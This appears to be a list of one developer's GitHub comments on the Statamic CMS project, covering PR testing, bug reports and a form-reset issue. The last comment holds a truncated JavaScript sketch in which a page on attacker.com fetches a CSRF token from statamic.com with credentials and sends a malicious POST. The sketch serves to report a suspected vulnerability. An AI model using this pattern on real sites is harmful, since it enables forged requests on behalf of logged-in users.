Daniel Weaver

Would this be something in the future where Statamic itself would support a certain number of popular image providers by default? Or would they all be addon based? Just curious...

Sorry I haven't gotten to review the PR yet, I will let you know if it works.

Man time has flown, but I finally got to test this and it works! Sample size of one but it solves the issue for me.

> Thanks for the info! Indeed, the `loopback` command was not implemented for the Windows version yet. Can you share your use case for it so we can see if...

This is also happening with the user creation wizard and custom fields that are required + sometimes and conditionally hidden. [Link to discord](https://discord.com/channels/489818810157891584/489818810157891586/1275904430427996221)

Oops I didn't run the full test suite. I'll fix these real quick.

Should I resubmit this as a PR against master for 6.x? It might make more sense since I am changing the Asset rules pretty heavily

I believe this is due to the PublishForm resetting the values after every save - https://github.com/statamic/cms/blob/5.x/resources/js/components/entries/PublishForm.vue#L607 Not sure why this is done, unless it's a multi-user editing the same content...

I could be entirely wrong, but isn't the whole point of CSRF that you can't get a token so you can't make backend requests from other domains? Wouldn't this allow...

To follow up, I think in theory this allows this attack: ```js // On attacker.com fetch('https://statamic.com/!/csrf', { credentials: 'include', }) .then(r => r.json()) .then(data => { fetch('https://statamic.com/any-malicious-request', { method: 'POST',...